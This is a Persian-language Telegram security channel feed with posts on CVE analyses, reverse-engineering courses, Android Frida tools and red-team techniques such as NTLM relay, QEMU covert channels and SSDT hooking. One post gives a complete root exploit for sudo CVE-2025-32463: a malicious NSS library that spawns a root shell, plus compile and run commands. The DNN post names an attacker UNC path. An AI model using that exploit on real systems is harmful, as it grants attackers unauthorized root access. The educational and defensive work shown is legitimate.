Security Analysis – Telegram
Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
⭕️CVE-2025-29927
1
⭕️تحلیل و بررسی آسیب‌پذیری امنیتی در Next.js (CVE-2025-29927)

در واقع Next.js یکی از محبوب‌ترین فریم‌ورک‌های React برای توسعه‌ی وب اپلیکیشن‌ها است که امکانات زیادی برای بهینه‌سازی عملکرد ارائه می‌دهد.
با این حال، همانند هر فناوری دیگری، Next.js نیز ممکن است آسیب‌پذیری‌هایی داشته باشد که در صورت عدم به‌روزرسانی، می‌تواند به هکرها اجازه‌ی سوءاستفاده دهد.

حالا قراره آسیب‌پذیری CVE-2025-29927 را بررسی کنیم، نحوه‌ی شناسایی آن را توضیح می‌دهیم و روش‌هایی برای پچ کردن آن ارائه می‌کنیم.

چگونه یک اپلیکیشن Next.js آسیب‌پذیر را شناسایی کنیم؟

روش‌های رایج برای شناسایی Next.js
برای شناسایی اینکه آیا یک وب اپلیکیشن از Next.js استفاده می‌کند یا نه، می‌توان از تکنیک‌های زیر استفاده کرد:

1. برخی سرورها در هدرهای HTTP مقدار X-Powered-By: Next.js را ارسال می‌کنند.

2. فایل‌های JS و CSS تولید شده توسط Next.js معمولاً در مسیر زیر قرار دارند.
/_next/static/

3. در مرورگر، آبجکت next به‌صورت گلوبال تعریف شده است که نسخه‌ی Next.js را نمایش می‌دهد.
اپلیکیشن‌های Next.js معمولاً یک آبجکت گلوبال (window.next) در سمت کلاینت دارند که شامل اطلاعات نسخه‌ی Next.js است. این مورد را می‌توان از طریق کنسول مرورگر بررسی کرد:
console.log(window.next?.version);


شناسایی نسخه‌ی آسیب‌پذیر
با ترکیب روش‌های بالا، می‌توان اپلیکیشن‌هایی را که از نسخه‌های آسیب‌پذیر Next.js استفاده می‌کنند، شناسایی کرد. با این حال، فقط شناسایی نسخه‌ی آسیب‌پذیر کافی نیست!
بلکه باید بررسی کنیم که آیا مسیرهای حساس واقعاً تحت تأثیر این آسیب‌پذیری قرار دارند یا خیر.

تشخیص مسیرهای آسیب‌پذیر

مسیرهای آسیب‌پذیر معمولاً توسط مکانیزم احراز هویت محافظت می‌شوند و پیدا کردن آن‌ها از طریق Crawling یا FUZZING ساده کارآمد نیست. به این دلیل که:
بسیاری از اپلیکیشن‌های Next.js به صورت SPA (Single Page Application) اجرا می‌شوند و Crawling آن به ابزارهای پیشرفته‌تری مثل مرورگرهای Headless نیاز دارد.
مسیرهای آسیب‌پذیر معمولاً به‌صورت مخفی در کدهای جاوا اسکریپت تعریف می‌شوند و Crawler سنتی به آن‌ها دسترسی ندارند.

روش جایگزین: استخراج مسیرهای API از فایل‌های JS
به جای اتکا به Crawling، می‌توان از تحلیل سورس‌کد جاوا اسکریپت یا استفاده از اکستنشن BurpJsLinkFinder برای استخراج مسیرهای مهم مثل API استفاده کرد. در این روش:

1- با تحلیل سورس کد JS یا استفاده از BurpJsLinkFinder میتوانیم مسیرهای مهم رو بیرون بکشیم و تو یه فایل ذخیره کنیم.
2- سپس مسیرهای استخراج شده، با یک Nuclei template مخصوص آزمایش می‌شوند تا ببینیم که آیا واقعاً آسیب‌پذیر هستند یا خیر.
یک نمونه Template خوب برای Nuclei از ProjectDiscovery

مثال از یک مسیر API در یک فایل جاوا اسکریپت:

const BASE_API = "/api/v1";

function getUser(id) {
http.get(BASE_API + "/user/" + id);
}


نتیجه‌ی تحلیل این کد، مسیر زیر را مشخص می‌کند:

GET /api/v1/user/{id}


با استفاده از این روش، میشه مسیرهای پنهان و آسیب‌پذیر را شناسایی کرد و بدون نیاز به Crawling، به‌صورت دقیق‌تر این آسیب‌پذیری را تحلیل کرد.


چند اقدام و راهکار در مواجه با CVE-2025-29927 برای تیم Develop
بهترین راهکار: آپدیت کردن به نسخه‌ی امن Next.js
بهترین و موثرترین روش برای جلوگیری از این آسیب‌پذیری، به‌روزرسانی Next.js به نسخه‌ی پچ‌شده است.

اقدامات موقت (در صورت عدم امکان آپدیت فوری)
اگر امکان آپدیت فوری وجود ندارد، می‌توان به‌صورت موقت اقدامات زیر را انجام داد:

1. بلاک کردن هدر x-middleware-subrequest در تنظیمات سرور، WAF یا پروکسی برای جلوگیری از اکسپلویت.
2. مانیتورینگ لاگ‌ها و بررسی درخواست‌های مشکوک که شامل این هدر می‌شوند.
@securation
1
Media is too big
VIEW IN TELEGRAM
#DEMO #OFEN

در این ویدیو، که دموی درس ۶۸ از فصل دوم "دوره‌ی برنامه‌نویسی تهاجمی است"، در بخش اول به کدنویسی روش‌های مختلف شناسایی نمونه‌ی جدید (Instance) از یک برنامه پرداختیم. سپس در بخش دوم، با مهندسی معکوس نرم‌افزار OBS Studio بررسی کردیم که این برنامه از چه مکانیزمی برای شناسایی اجرای نمونه‌های (Instance) جدید استفاده می‌کند و در ادامه، همان روش را در پروژه‌ی خودمان پیاده‌سازی کردیم.

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
ویدیو ی دموی جلسه 75 از "دوره برنامه نویسی تهاجمی مختص به تیم قرمز"

در این ویدیو، به صورت قدم به قدم وارد دنیای ساختار های داخلی ویندوز شدیم و بررسی کردیم که چگونه می‌توان بدون وابستگی به API های معمول، به لیست ماژول‌ های لود شده در یک پروسه دسترسی پیدا کرد. این تکنیک نه‌ تنها در توسعه ابزارهای سطح پایین یا امنیتی بسیار کاربردی است، بلکه در موقعیت‌هایی که نیاز به پنهان‌ کاری، تحلیل عمیق، یا بای‌پس کردن ابزار های امنیتی داریم، اهمیت ویژه‌ ای پیدا می‌کند.

⬅️ بررسی گام‌ به‌ گام دسترسی به لیست ماژول‌ ها از طریق ساختار PEB
⬅️ آشنایی دقیق با ساختارهای PEB_LDR_DATA، LDR_DATA_TABLE_ENTRY و LIST_ENTRY
⬅️ درک دقیق از مفهوم لیست پیوندی دو طرفه (Doubly-Linked List) و اهمیت آن در لیست‌ کردن ماژول‌ ها
⬅️ نکات مهم و حساس هنگام پیمایش لیست ماژول‌ها از طریق PEB، بدون استفاده از API های کلاسیک مثل EnumProcessModules - GetModuleHandle - LoadLibrary و GetProcAddress

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
#Article #Tools

چند مقاله و ابزار درباره ساختار PE قبلاً در وبلاگ قرار داده بودم که امروز اون‌ها رو به‌روزرسانی کردم. سورس‌کدها و ویدیوهای دمو هم اضافه شده تا این مفاهیم بهتر قابل درک باشن و راحت‌تر بتونید با موضوع ساختار PE ارتباط برقرار کنید.

⬅️بررسی و تحلیل Checksum در ساختار PE
⬅️بررسی و تشریح DEP و ASLR در ساختار PE
⬅️ابزار تبدیل DLL به EXE
⬅️ابزار حذف DEP و ASLR از ساختار PE
⬅️ابزار تصحیح Checksum در ساختار PE

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
#DWORD

دوره چالش های مهندسی معکوس سطح 1 در لیست دوره های آکادمی قرار گرفت

این دوره رایگان، فرصتی است برای ورود عملی به دنیای مهندسی معکوس و حل چالش‌های واقعی در حوزه تحلیل باینری. در طول دوره، به سراغ مجموعه‌ای از چالش‌های منتخب از مسابقات بین‌المللی CTF می‌رویم.

این چالش‌ها از رقابت‌هایی مانند Flare-On یکی از معتبرترین و شناخته‌شده‌ترین مسابقات مهندسی معکوس برگرفته شده‌اند.

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ PairIP Protection Remover

یک ابزار ساده و چند پلتفرمی برای دور زدن پروتکشن PairIP گوگل در برنامه‌های Flutter می باشد که در هر دو نسخه پایتون و بش موجود است.

📎 GitHub

@Securation
#Android #RE #Pairip #Flutter
⭕️ FridaScriptGen

این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن می‌کند و سپس به طور خودکار اسکریپت‌های Frida را برای دور زدن این بررسی‌های امنیتی ایجاد می‌کند.

📎 GitHub

@Securation
#Android #Frida
1
⭕️ Frida Launcher 🚀

سرور Frida را به راحتی و تنها با یک لمس، روی دستگاه‌های اندروید و شبیه‌سازها مدیریت کنید!

📎 GitHub

@Securation
#Android #Frida
⭕️ اخیرا آسیب ‌پذیری‌جدیدی از نوع LPE اخیرا با شناسه CVE-2025-32463 منتشر شده. این آسیب‌پذیری در صورتی فعال می‌شود که از پارامتر --Chroot استفاده شده و مسیر nsswitch.conf به صورت دستی کنترل شود.
به طوری که اگر در پیکربندی route از pass: unix:/path/to/socket استفاده شده باشد و پارامتر Share تنظیم نشده باشد، Sudo قبل از بارگذاری sudoers، فایل nsswitch.conf را از محیط chroot می خواند.
این یعنی مهاجم توانایی قرار دادن فایل تقلبی و یک shared object مخرب، اجرای کد به عنوان root انجام دهد بدون نیاز به اینکه در فایل sudoers ثبت شده باشد.
مراحل مربوط به رسیدن به سطح دسترسی مورد نیاز:
ساخت دایرکتوری chroot و فایل‌های موردنیاز
mkdir -p /tmp/pwnroot/etc
mkdir -p /tmp/pwnroot/lib


نوشتن shared library مخرب
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>

__attribute__((constructor)) void pwn() {
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/bash");
}



کامپایل shared library
gcc -fPIC -shared -o libnss_myexploit.so.2 myexploit.c


اجرای اکسپلویت
sudo -R /tmp/pwnroot id


#RedTeam #LPE #EXP
@securation
⭕️ مرکز فابا کجاست؟
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.

مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.

با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟

احتمالا پکت هایی که ارسال میشه هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.


#دستشوییهای_سایبری

@securation
😁2
#DWORD

بازنویسی کد با رویکرد مهندسی معکوس

دوره رایگان و تخصصی آکادمی DWORD

در این دوره تخصصی، با تمرکز بر مهندسی معکوس توابع کلیدی نرم‌افزارها و کتابخانه‌ها، به شما آموزش می‌دهیم چگونه منطق توابع را تحلیل، ایزوله و بازنویسی کنید.

این فرآیند مشابه روش fuzzing است که در آن، با ساختن یک harness، تابع هدف را با ورودی‌های مختلف آزمایش می‌کنیم تا رفتار و مسیرهای منطقی آن را کشف کنیم.

با گذراندن این دوره، مهارت‌های لازم برای:

⬅️درک دقیق ورودی‌ها و خروجی‌های توابع
⬅️تحلیل رفتار و مسیرهای منطقی
⬅️بازنویسی توابع به صورت خوانا و مستند

را کسب خواهید کرد تا بتوانید مثل یک تحلیلگر امنیتی حرفه‌ای یا توسعه‌دهنده ابزارهای امنیتی عمل کنید.

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ امنیت⁩ CI/CD رو امشب در خدمتتون هستیم:

🕘 ساعت ۹

💡روشهای نفوذ از طریق CI/CD
💡دسترسی به سرورهای تست و پروداکشن
💡دسترسی به SECRETها
💡اصول امن سازی و توسعه امن نرم افزار

meet.google.com/rdr-cutu-qwd

#CICD #Security
@securation
⭕️ اخیرا مقاله ای از TrustedSec نوشته شده که روشی هوشمندانه به جهت ایجاد Covert Channel بین Guest و Host از طریق QEMU Virtualization بدون نیاز به NIC یا ارتباط TCP/IP ارایه شده است.
مهاجم با سوءاستفاده از VirtIO queues، Shared memory یا I/O emulation hooks داده‌هایی رو منتقل می‌کند که در سطح Network stack قابل تشخیص نیستند. این تکنیک می‌تواند از QEMU‌ های Patch‌ شده یا حتی از قابلیت‌های Native مثل Virtio-serial برای ارسال داده بین Host و Guest استفاده کند.
به طوری که QEMU به‌عنوان یک Hypervisor اجازه‌ی انتقال داده بین Host و Guest رو از طریق Shared memory, Virtio devices یا Custom I/O Handlers می‌دهد. این مسیرها می‌توانند بدون اینکه بسته‌ای در شبکه واقعی رد و بدل بشود، اطلاعات حمل کنند.

و از Chardev, -Device virtserialport برای ساخت یک Pipe-like interface بین Host و Guest استفاده می‌شود. که امکان ایجاد Shell خود از طریق این interface روی Guest قرار دهد و روی Host listener بنویسد که داده‌ها رو پردازش کند.

و البته QEMU دارای دستورات داخلی مانند QEMU-ga، Guest-set-time, Guest-exec هست که برای مدیریت VM طراحی شدن، ولی می‌تواند به‌عنوان ابزار انتقال داده پنهان استفاده شود.

#RedTeam #C2 #Exfiltration
@securation
🔥1
Forwarded from OS Internals (Abolfazl Kazemi)
🔍 قابل توجه علاقه‌مندان به امنیت سیستم‌عامل و توسعه اکسپلویت در لینوکس

من همیشه به تدریس علاقه‌مند بوده‌ام؛ نه صرفاً آموزش تئوری، بلکه انتقال واقعی تجربه‌ها و درک عمیق مفاهیم فنی. از سال‌ها پیش، تمرکزم روی internal سیستم‌عامل‌ها—به‌ویژه ویندوز و لینوکس—و مباحث امنیتی بوده و سعی کرده‌ام این مطالب تخصصی را به زبانی ساده، کاربردی و قابل‌فهم برای دیگران ارائه دهم.

🎓 حالا نوبت یک قدم جدید و متفاوت رسیده:
«دوره‌ی Exploit Development در لینوکس»
از تحلیل آسیب‌پذیری‌ واقعی گرفته تا نوشتن اکسپلویت‌های عملی و کاربردی.

اما تصمیم گرفتم یک شرط خاص برای انتشار این دوره بگذارم:
🎯 اگر اعضای کانالم به ۵۰۰۰ نفر برسند، دوره را به صورت کامل و رایگان منتشر می‌کنم.

بیش از ۲۰ ساعت ویدئو و تمرین عملی بدون تبلیغات، بدون پرداخت هزینه—صرفاً برای این‌که دانش تخصصی، راحت‌تر و بی‌واسطه به دست کسانی برسه که واقعاً به یادگیری اهمیت می‌دن.

🧠 اگر شما هم به این مسیر علاقه‌مندید یا فکر می‌کنید افراد دیگری در اطرافتان هستند که این محتوا به دردشان می‌خورد، خوشحال می‌شم با معرفی کانالم به دوستان‌تان از این پروژه حمایت کنید.

📎 لینک کانال:
https://news.1rj.ru/str/OxAA55

✍️راستی سرفصل دوره رو هم می‌تونید در لینک زیر مشاهده کنید:
https://news.1rj.ru/str/OxAA55/140
⭕️ یعنی آدم انقدر نوب باشه فکر کنه هک شدن نوبیتکس بخاطر این یوزر پسورد هایی باشه که استیلر ها قبلا به فروش گذاشتن؟
شما شرکت یا سازمانتون white list برای متصل شدن نداره ؟
شما سازمانتون 2fa نداره که حتی با داشتن یوزر پسورد احراز هویت لاگین موفق بزنه؟
شما سازمانتون VPN نداره برای وصل شدن و لاگین شدن به یک سامانه ؟
برخی عزیزان رو لینکدین و تلگرام میبینیم تحلیل‌های حاکر بازی که برای خریدن توجه دارند ادعا می‌کنند یوزر پسورد چندکاربر قدیمی باعث نفوذ شده ، که البته بجز اینکه این یوزرها هیچ نقش در اتفاقات اخیر نداشته اند، بلکه نشون داد شما حتی دانش پایه امنیت شبکه و دانش بلاکچین و دانش امنیت وب و هیچ گونه علمی درمورد Zero trust هایی که اعمال میشه ندارید.
خرید جلب توجه با شایعه پراکنی های غیرفنی و غیرعلمی فقط نشون میده نوب بودن و سطحی بودن شما با پر کردن پروفایل های لینکدین از واژه های هکر و محقق در همین حد هست.
یه سایت هستی با user : password منقرض شده ی کاربر لاگین کنید هم مدیریت کل سرورها و کیف پول ها حتی بصورت فیزیکال دستته و هم میتونید با یک دکمه چند میلیون دلار پول رو انتقال بدید 🙏
@securation
🔥1
⭕️ حمله NTLM Relay بر بستر SMB (پورت 445) سال‌هاست که در عملیات‌های Red Team جایگاه دارد، اما همواره با یک محدودیت جدی همراه بوده گیر افتادن در چارچوب پروتکل SMB و عدم امکان استفاده از ابزارهای قدرتمندتر مانند WMI، WinRM یا حتی RDP. از سوی دیگر، هر تلاش برای dump گرفتن از هش‌ها یا اجرای shell، با ریسک بالا و احتمال شناسایی توسط EDR همراه است.

تیم SpecterOps در مقاله‌ای با عنوان «Escaping the Confines of Port 445» نگاهی نو به این چالش دارد
به‌جای تلاش برای باز کردن پورت‌های بیشتر، از همان SMB بیشترین بهره را ببریم.

استفاده از پراکسی ntlmrelayx --socks برای ایجاد یک tunnel امن و دائمی بر بستر SMB.

به‌جای ابزارهای نویزی، از ابزارهای native ویندوز مثل sc.exe برای کنترل سرویس‌ها استفاده می‌شود
بدون ایجاد آلارم در EDR.

سپس سرویس WebClient روی سیستم هدف فعال می‌شود.

فعال شدن WebClient منجر به ارسال درخواست WebDAV به سرور ما می‌شود؛ که حالا می‌توان آن را به LDAP یا LDAPS روی Domain Controller رله کرد.

از این نقطه به بعد، مسیر برای حملاتی مانند Shadow Credentials یا RBCD باز است حتی بدون نیاز به پورت‌های اضافی یا استخراج هش.

#RedTeam #AD #NTLMRELAY
@securation
1
⭕️ تلویزیون های اسنوا دچار اختلال و قطعی کامل شده اند و هنوز مشخص نیست بخاطر آپدیت نبودن دیوایس هست یا فریمور مشکل پیدا کرده یا هک شده اند.
فعلا بصورت انلاین هیچکونه تعمیر/تغییر نرم افزاری برای این تلویزیون ها وجود ندارد.
باید منتظر اطلاعیه ی شرکت اسنوا باشیم.

#IOT
@securation
#Article

Hells Hollow: A new SSDT Hooking technique

در پست قبلی درباره‌ی تکنیک‌های AltSyscall صحبت کردم. امروز در ادامه‌ی همون موضوع، قصد دارم یک تکنیک جدید با نام غیررسمی Hell's Hollow رو معرفی کنم.

این تکنیک با تکیه بر قابلیت‌های AltSys و انجام تغییراتی روی ساختار حساس KTRAP_FRAME، امکان Hook کردن SSDT رو به شکلی متفاوت فراهم می‌کنه. یعنی به جای دست‌کاری کپی‌هایی از Trap Frame، این بار مستقیماً سراغ نسخه‌ی واقعی اون می‌ریم. نتیجه‌ی این کار، توانایی در کنترل و تغییر مسیر تمام System Callها در سطح بسیار پایین و حساس سیستم‌عامله.

POC Link : Hell's Hollow is a Windows 11 compatible rootkit technique that is equivalent to a modern (PatchGuard and HyperGuard) resistant technique to effectively perform SSDT Hooking (System Service Dispatch Table) - bypassing all previous defence mechanisms put in the kernel.

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
2
⭕️ جدیدترین گزارش تحقیقاتی تیم Assetnote در Searchlight Cyber، اقدام به بررسی آسیب‌پذیری Abusing Windows/.NET quirks and Unicode Normalization در DNN (نسخه‌های ۶.۰.۰ تا پیش از ۱۰.۰.۱) کرده است
بررسی‌های فنی نشان می‌دهد که با استفاده از کاراکترهای Unicode full‑width مانند U+FF0E و U+FF3C، می‌توان مسیرهای فریب‌دهنده را طوری ساخت که پس از نرمال‌سازی تبدیل به UNC path شوند: \attacker .com\share.jpg. اندپوینت‌های متداول مانند File.Exists یا WebClient بدون احراز هویت، باعث ارسال hash‌ های NTLM به سرور مهاجم می‌شوند که باعث یک حمله Credential Leakage بدون دخالت کاربر می شود.
نکات کلیدی:
• آسیب‌پذیری pre-auth بوده و نیازی به login ندارد
CVSS نمره 8.6، مخاطره بالا
• ترکیب ضعف‌های Path.Combine و Unicode normalization bypass باعث وقوع این آسیب‌پذیری شده است


توصیه برای تیم‌های امنیت:

فوراً DNN را به نسخه ۱۰.۰.۱ یا جدیدتر آپدیت کنید

از ارسال ترافیک ‌های SMB خروجی خودداری و آن‌ها را ببندید

توسعه‌دهندگان باید ترتیب sanitizenormalizevalidate را رعایت کنند



#RedTeam #DNN #NTLM
@securation
2👏1